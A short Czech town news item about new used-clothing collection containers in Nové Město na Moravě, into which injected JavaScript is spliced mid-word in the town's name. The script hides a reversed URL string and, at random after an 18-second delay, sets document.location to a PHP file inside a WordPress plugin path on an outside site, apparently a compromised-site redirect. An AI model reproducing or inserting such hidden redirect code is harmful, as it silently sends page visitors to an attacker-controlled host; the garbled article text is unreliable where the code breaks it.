Rainbow page separator

Ve Městě přibudou kontejnery na použitý textil

Úterý, 25. března 2014

Kontejner na použitý textil

Nové Měs["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Nové kontejnery na použitý textil se v rámci rozšíření systému sběru a třídění odpadu do konce května objeví v některých částech Nového Města na Moravě. Dosud bylo možno odevzdat nepotřebný textil a oděvy pouze ve sběrném dvoře, případně v rámci pravidelné sbírky pořádané Diakonií Broumov. Přímo v Novém Městě budou umístěny tři kontejnery na použité ošacení, v každé z místních částí města pak po jednom. O přesném umístění kontejnerů a pravidlech jejich používání budou obyvatelé včas informováni. Vybraný textil a oděvy budou roztříděny na oblečení dále použitelné pro charitu a věci poškozené a již nepoužitelné, které budou následně recyklovány.